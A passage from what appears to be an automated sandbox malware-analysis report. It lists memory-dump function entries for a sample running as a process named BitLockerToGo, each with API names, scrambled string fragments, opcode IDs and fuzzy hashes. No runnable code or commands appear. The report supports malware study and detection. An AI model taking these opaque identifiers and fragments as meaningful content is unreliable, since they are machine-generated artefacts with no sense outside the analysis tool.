                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0C04871049121AACA502F15FC09BCA3F68AF8A360F0A10A6B844660B1C661BC828A98
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: u$u$ u$#$$N$$u$1$4$53$5u$:$=$D$D$Fu$G$J$Ou$Vu$W:$Wu$YL$_L$`$`$a$eu$f$gu$hu$iu$i$ku$ou$ou$r!$su$wu$.
                                                                                                                                                                                                              • API String ID: 0-1297114619
                                                                                                                                                                                                              • Opcode ID: 58b6f396e5f66a77703e977543d4979c921445a7395f89a2492088771659af1e
                                                                                                                                                                                                              • Instruction ID: 3d25608720fc248fed8d15c48dbd04b497e5b2bc4c78e1578a4b9e3efca3bb82
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58b6f396e5f66a77703e977543d4979c921445a7395f89a2492088771659af1e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39F2AC7551C3808BC324AF29C5853EFBBE1AF85310F14892EE9D997391E7788981CB4B
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MetricsSystem
                                                                                                                                                                                                              • String ID: $ "C$$%C$$)C$(&C$?(C$H%C$L&C$i"C$o%C$p!C$'C$'C$'C$'C$'C$'C$'C$'C$'C$'C$'C$'C
                                                                                                                                                                                                              • API String ID: 4116985748-1337545606
                                                                                                                                                                                                              • Opcode ID: 5ba615d0c2055df3fecca8f494ee0eeee7678f8c4cc7a0e6020c1d6db8d3eef0
                                                                                                                                                                                                              • Instruction ID: 8044c1868bac973a8dda2efc51331480648de41511a2985fbe6f7e63c9d69fb2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ba615d0c2055df3fecca8f494ee0eeee7678f8c4cc7a0e6020c1d6db8d3eef0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52B15CB44097849FE774DF15E58978ABBF0BBC5308F00891EE5988B351D7B89948CF8A
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Uninitialize
                                                                                                                                                                                                              • String ID: !=s=$"=6=$#=<=$$='=$&=O=$)=k=$,="=$1=g=$3=2=$6= =$8=1=$9=+=$<=)=$q=l=$}=p=
                                                                                                                                                                                                              • API String ID: 3861434553-2084406169
                                                                                                                                                                                                              • Opcode ID: b23ca35d2ca6ed04d69cbad4dac612794351e0670c1052edcc4022b74a7f11f3
                                                                                                                                                                                                              • Instruction ID: c8467379c40931654f9108cc5a18d97ccb743dfa112c618ed77d89b6e048be37
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b23ca35d2ca6ed04d69cbad4dac612794351e0670c1052edcc4022b74a7f11f3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68B1E2B4A047428BD728CF69C490222FBF1FF9630071885AEC4D68F796D739E845CB96
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: .;G;$>;G;$@;F;$G;W;$Q;T;$V:V:$W;_;$[;D;$]:\:$c:`:$g;<;$k;C;$u`F
                                                                                                                                                                                                              • API String ID: 0-3103227700
                                                                                                                                                                                                              • Opcode ID: cf5f6cfcfcc8c34ddac180bef316d3683c96ab5eb13888d248b4c790b45a638b
                                                                                                                                                                                                              • Instruction ID: 028213aa433ddf288215a5674f5d4d0f941e1b1d4c6d6926550f47548b27ddf9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf5f6cfcfcc8c34ddac180bef316d3683c96ab5eb13888d248b4c790b45a638b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 776279B5904728DFCB24CF59D881A99BBB1FF45300F4681ACC95A6F326DB35A952CF80
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: $r0r$%r$r$'r0r$1r6r$2r&r$2r3r$2r_r$4rur$4rzr$8r(r$>r.r
                                                                                                                                                                                                              • API String ID: 0-2425828681
                                                                                                                                                                                                              • Opcode ID: e205d00ee8b9a4674dc0b4fac78f282993e04d376fffca3607ecebd0d495f633
                                                                                                                                                                                                              • Instruction ID: 81cc660f109df6557e9303301d4da439a098a7d82eeea6cd058469eeb5b93a8e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e205d00ee8b9a4674dc0b4fac78f282993e04d376fffca3607ecebd0d495f633
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 978113B19002159FD7A49FAAD941B6ABA70FB49710F5101ECF900AF3AACB70C851CFD9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: !w$#"$);$2&$2&$M@$O!$T#$T#$a|
                                                                                                                                                                                                              • API String ID: 0-3803853066
                                                                                                                                                                                                              • Opcode ID: 69a5a64790731de0feb230137af4b1b82fe8995f99c315a87f0ff6618fa1f260
                                                                                                                                                                                                              • Instruction ID: acfacfabb2a5029957ff4e17980624ce5e54fff5e14e6eddc0bb2ddcddbd3dc1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 69a5a64790731de0feb230137af4b1b82fe8995f99c315a87f0ff6618fa1f260
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 49C100766083508BC714CF25D4902ABBAE2EFD1300F29493EE8D66B391D77989198BC7
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
• String ID: ,L
• API String ID: 2832541153-125990122
Strings
Similarity
• API ID:
• String ID: DN}\$FUKL$F^WQ$GRO]$TNm\$T^iQ$XUYL$_WCR$f4P4
• API String ID: 0-2031968443
Strings
Similarity
• API ID:
• String ID: 2#E#$@#O#$G#;#$M#X#$Y#S#$[#@#$\"$]#^#$##
• API String ID: 0-479699498
Strings
Similarity
• API ID:
• String ID: A>A$' $-1_1$d$j5x5$p5$p5w5$p55
• API String ID: 0-3154447829
Strings
Similarity
• API ID:
• String ID: !<$2C1B840C4ED5F58F4EC0E979F11769B5$act$a7$cb$i{$rf
• API String ID: 0-670324967
Strings
Similarity
• API ID:
• String ID: (./.$(:z:$8:$d.h.$v:g:$.
• API String ID: 0-3666395891
Strings
Similarity
• API ID:
• String ID: &> >$8>>$;>>$=>3>$h't$t3
• API String ID: 0-1698606997
Strings
Similarity
• API ID:
• String ID: %I$I$)&$w$II$II$II
• API String ID: 0-4115442998
Strings
Similarity
• API ID:
• String ID: 2[A$D$Yj]j$^6d6$7\6
• API String ID: 0-4002117736
                                                                                                                                                                                                              • Opcode ID: 09de04ddfc22846e8d90e8624b3dcdff5cfe688476c99d53f7b16d8ccdb9ba5f
                                                                                                                                                                                                              • Instruction ID: 65facd696550c81917b79e18011b573b99a6ce16cc60624ffa50a3b763ffd147
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09de04ddfc22846e8d90e8624b3dcdff5cfe688476c99d53f7b16d8ccdb9ba5f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 43721374118301CBD728CF24C891BABB7E2FFCA304F59496DE4869B361E7388945CB5A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: $o)p$$s(w$:0>z$P[B$hW4i
                                                                                                                                                                                                              • API String ID: 0-4169148768
                                                                                                                                                                                                              • Opcode ID: 92bff637c38e803f548c52a7efeb1d358451f7fd467df843ebc95df7d03fbb13
                                                                                                                                                                                                              • Instruction ID: 90a262017232193678903056d2074bc7886d7778d7aabcd8a83e3143f0e93dff
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 92bff637c38e803f548c52a7efeb1d358451f7fd467df843ebc95df7d03fbb13
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2026675A187908FC7149F25E84126BBBE1AFC6304F48883EE5C59B391E739D905CB8A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 4[$7$@[k[$I[C[$gfff
                                                                                                                                                                                                              • API String ID: 0-4159987592
                                                                                                                                                                                                              • Opcode ID: 0258b57c9dd407ffd696f3744c87620aeba75f9196f01a32ac6b1d76cfd3850a
                                                                                                                                                                                                              • Instruction ID: 8cdd63041f0f842168102e3a5758eccb549fd33851e9219b6cf928ec0aa00146
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0258b57c9dd407ffd696f3744c87620aeba75f9196f01a32ac6b1d76cfd3850a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E47157B2A142214BC338CF29DC527AB72D6EBC5314F09863ED485DB395EB38C94687C4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: &%$RuB$AF$AF
                                                                                                                                                                                                              • API String ID: 0-3852744230
                                                                                                                                                                                                              • Opcode ID: 88d226bd17e06d4a50ad62b2e6fdf24f15a5ca1c4edb3bfdd6b42e1eb4cdd823
                                                                                                                                                                                                              • Instruction ID: dfa204c89a3c58449d1a0b749b393e7ded32929c94e4c84fc42d7b7b284c9193
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88d226bd17e06d4a50ad62b2e6fdf24f15a5ca1c4edb3bfdd6b42e1eb4cdd823
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5EB1CDB42083118BC714DF59D86176BB7B1FF86364F04892DE4868B7A0E778DA44CB9A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID: aa$aa$aa
                                                                                                                                                                                                              • API String ID: 2994545307-1415837818
                                                                                                                                                                                                              • Opcode ID: 05b8bf578a61307734bfe628953ef62c7d2f2f2bb29f05ab28d29850d8836f52
                                                                                                                                                                                                              • Instruction ID: 4ebdd1466e0f266038cad9e56a4b6f857e8bacc5c0bd639eab04d4e0b70e9bb2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05b8bf578a61307734bfe628953ef62c7d2f2f2bb29f05ab28d29850d8836f52
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3882E1356083009BD728DF64C951BABB7E2FFD5700F14882EE9859B361DB759C81CB8A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 0$8
                                                                                                                                                                                                              • API String ID: 0-46163386
                                                                                                                                                                                                              • Opcode ID: 3ed0d6830a8554cf46025e2987cd2b095edf7e30737a53db60f8be4faf2ae410
                                                                                                                                                                                                              • Instruction ID: 0cabc95b40cbdf852b40321e471e995f7ff437c6369a2c1dd20d38e14c43e175
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ed0d6830a8554cf46025e2987cd2b095edf7e30737a53db60f8be4faf2ae410
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F67236716083419FD714CF28C880B9BBBE1AFC4314F14892EF9899B391D379D949CB96
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: _Ve;$_Ve;
                                                                                                                                                                                                              • API String ID: 0-151471760
                                                                                                                                                                                                              • Opcode ID: 7c31af2349487065de3ec16c50fa5805335ed70d4b80ecce53eca0737d434edb
                                                                                                                                                                                                              • Instruction ID: b9cef9a62d789277b08974abb1ffb3ade618f9a29f5c2e9914fbabe007b2601f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c31af2349487065de3ec16c50fa5805335ed70d4b80ecce53eca0737d434edb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0012E436B14210CFD318CF28E89066AB3E2EFCA314F1A857DD98997394DB39DC558B85
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: Wmc'$!}
                                                                                                                                                                                                              • API String ID: 0-2669877982
                                                                                                                                                                                                              • Opcode ID: 44664b35395161a749d65300822a10a44aefc4fe1f7dee0ed1090c52d52e3bcd
                                                                                                                                                                                                              • Instruction ID: 8c0078ad2e5ec3af00df463890218d70eee204b7817b341e649e300aeaab5c14
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44664b35395161a749d65300822a10a44aefc4fe1f7dee0ed1090c52d52e3bcd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1EC10EB56083A08BD324DF25D89076BBBE1FFE6700F158A2DE4C59B360D7799801CB86
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID: L4$L4
                                                                                                                                                                                                              • API String ID: 2994545307-3214460456
                                                                                                                                                                                                              • Opcode ID: a09ee7167c115e170ee42f0b26bdb240993a8ea3bbdbe79a7d92323b5bf92e40
                                                                                                                                                                                                              • Instruction ID: 0731e5ece17aa7bf616b3a6a295aa08d5fa02eeb2a81c467f509a8fc4edcbb82
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a09ee7167c115e170ee42f0b26bdb240993a8ea3bbdbe79a7d92323b5bf92e40
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67C15871208301AFC724CF24D891BABB7E2FFD5314F15492DE58687261DB34D885CB4A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: )$IEND
• API String ID: 0-707183367
• Opcode ID: 8c0879b488e29b7b094453b4c94cba1a031e2a5f1f351697210e4e01a418adc0
• Instruction ID: 332bef3d2256316ea487da6c93dd4fd52e2146b24c4f6939ef00c301c6d45761
• Opcode Fuzzy Hash: 8c0879b488e29b7b094453b4c94cba1a031e2a5f1f351697210e4e01a418adc0
• Instruction Fuzzy Hash: 5ED1D0B19083449FD710DF14D84175FBBE4AB94308F14482EFA98AB3C2D779D908CB96
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: $*W{$$*W{
• API String ID: 0-3402859032
• Opcode ID: e217d1e85ac749c711554024fabc208f082ea7765bcccc4869b06ed7844579f9
• Instruction ID: 89601e843a8af6c4a7b9a2e3ca9b4a9194c7c5369a803fd787dd20af866d41cc
• Opcode Fuzzy Hash: e217d1e85ac749c711554024fabc208f082ea7765bcccc4869b06ed7844579f9
• Instruction Fuzzy Hash: 6FD10576605B408FC314CF38D8912A6BBF2FFD9314F19897DD5AA8B3A5EA34A405CB05
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: $*W{$$*W{
• API String ID: 0-3402859032
• Opcode ID: e0e532e5eed10512a05d9f33e28991b7ab72ab192889a2371727cc8a6b9819e2
• Instruction ID: b3fe1d90cb9c26ad1efe6a8261d78966e4932c76ce12017a8fd756a5f4e4757a
• Opcode Fuzzy Hash: e0e532e5eed10512a05d9f33e28991b7ab72ab192889a2371727cc8a6b9819e2
• Instruction Fuzzy Hash: 51C12876604B408FC314DF38D8912A6BBF2FFD9304F19856DD5DA8B3A5E634A405CB46
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: 8${|
• API String ID: 0-3202841668
• Opcode ID: 3a4bf5a68616b208143da4ed44c08f0214b4fe7e5986b103ebe526cfbc1605f2
• Instruction ID: f4279dad7fc729c772346c1dddf8315196a190289476fe21baff5b3aa9135ae8
• Opcode Fuzzy Hash: 3a4bf5a68616b208143da4ed44c08f0214b4fe7e5986b103ebe526cfbc1605f2
• Instruction Fuzzy Hash: AC71F57460C3828AD7158F65845037BFBE0AFA6344F14487EE4D1AB382D779C90AC76A
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: `
• API String ID: 0-1305765250
• Opcode ID: 895bdd23654af2fb364c17a96863134e6f6d8bac363d368a96ee22f748821227
• Instruction ID: 38f18979144820d99dee7be26b945be2aac2fb028bfa52c60cecf0e4c905a6d9
• Opcode Fuzzy Hash: 895bdd23654af2fb364c17a96863134e6f6d8bac363d368a96ee22f748821227
• Instruction Fuzzy Hash: 9D82F1715083118BC724CF24C8917ABB7F1EFC9714F19892DE8C99B360EB389991CB5A
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: +
• API String ID: 0-2126386893
• Opcode ID: a64b34fce99f051cdda37bd8dc09b4b96a909e6ab97d51a4b6ddcf059080cc53
• Instruction ID: f9e47fcdc7dd1a288488f0cb1851d021d3a8dcab6bad8c8dbb85561ee67222a3
• Opcode Fuzzy Hash: a64b34fce99f051cdda37bd8dc09b4b96a909e6ab97d51a4b6ddcf059080cc53
• Instruction Fuzzy Hash: D782F6B5A14B008FD714EF38C5813A7BBE1AF45314F148A3EE8AA873D1E778A545CB46
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: D]+\
• API String ID: 0-1174097187
• Opcode ID: 99920237508a57bee3f7b9fb797ff301e56fd41b745c58b9ee7d0abd35740245
• Instruction ID: ddae89e94fa7613d7035970ae1e98dcf5c7a0bdc30b84621de2eb000d4a5645c
• Opcode Fuzzy Hash: 99920237508a57bee3f7b9fb797ff301e56fd41b745c58b9ee7d0abd35740245
• Instruction Fuzzy Hash: 422221B9604200DBD3149F28EC42B6B73B1FF8A325F44062DF991872E1E7389D56C79A
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: InitializeThunk
• String ID: f
• API String ID: 2994545307-1993550816
• Opcode ID: b5f96252524c328db2b3e4b0ccb71f686dc1aca6dd8f00f983b4eeac3d8302c9
• Instruction ID: 8677803f5b7207b9331cf369e27e8e1d4aef0792b67f5df50bdee3370153d24d
• Opcode Fuzzy Hash: b5f96252524c328db2b3e4b0ccb71f686dc1aca6dd8f00f983b4eeac3d8302c9
• Instruction Fuzzy Hash: 7C12B1716483008FC324CF19C890A2BB7E2BF89724F159A2EE9E557391D735AD15CB8B
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: Subu
• API String ID: 0-3714210173
• Opcode ID: a0665cb699aaac200b281647bfda6ed39870c1ee095be1e80f08b263db44fa61
• Instruction ID: 4d1556d5dabe764ea5d93671de273c0167a2ce56800b098de114dd600b9d70d8
• Opcode Fuzzy Hash: a0665cb699aaac200b281647bfda6ed39870c1ee095be1e80f08b263db44fa61
• Instruction Fuzzy Hash: 72D10472A583108BD7148F64CC413ABB3E2EFD5344F1AC52DE9C4AB394E6799941878A
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: _Ve;
• API String ID: 0-1939530796
• Opcode ID: 6f0711ffefb6b9e6ef88812676b5a3e6c40b791f2a293509a016d1b6b7337fbc
• Instruction ID: 3b85f0a38b19b5696cf2eb78a9cded777bf4d33cdc9bef41e924c03e673bc628
• Opcode Fuzzy Hash: 6f0711ffefb6b9e6ef88812676b5a3e6c40b791f2a293509a016d1b6b7337fbc
• Instruction Fuzzy Hash: 69F1F336A14210CFD308CF28E89065AB3E2FBCA314F1A897DD98997354DB39DC55CB85
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: RuB
• API String ID: 0-1524862659
• Opcode ID: 13d3065cf8ce39c74fde21846a5ee6e5a48da03ebdc9ddc5ed20c783defba15a
• Instruction ID: 62719fa0ebf5d16e81ef8d0d5fabe93f3ad5b8af322d947f49754a29f0e22078
• Opcode Fuzzy Hash: 13d3065cf8ce39c74fde21846a5ee6e5a48da03ebdc9ddc5ed20c783defba15a
• Instruction Fuzzy Hash: 11E1E17260C3218BD314CF68D8517ABB3E1FFC5304F46892DE9999B390E7789905CB9A
APIs
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
                                                                                                                                                                                                              • API ID: Object
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2936123098-0
                                                                                                                                                                                                              • Opcode ID: cd1147a0fd4e65e800d773def7f2de9dd0ffddb6b4b92991d3245049d29392ef
                                                                                                                                                                                                              • Instruction ID: dfad21f5afe3abcc05f2451037bd241eb2e990617940d8abb69a7bd6536d9051
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd1147a0fd4e65e800d773def7f2de9dd0ffddb6b4b92991d3245049d29392ef
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C815DB5E002158FDB08DF68C9916AEBBF2BF8D300F258169D859AB350D7349D01CB95
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: _Ve;
                                                                                                                                                                                                              • API String ID: 0-1939530796
                                                                                                                                                                                                              • Opcode ID: 837c66b50d2ae596e21dd87d4d97af93c60dfb4c85b4304c5505eb5a1693ee45
                                                                                                                                                                                                              • Instruction ID: 179fb81e209a9126aee668462e0e7eeea8eb11d06fecca632c20efe6f5e23dca
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 837c66b50d2ae596e21dd87d4d97af93c60dfb4c85b4304c5505eb5a1693ee45
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14E10536A14210CFD318CF28E89066AB3E2FFC9314F1A897DE89997354DB39DC558B85
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
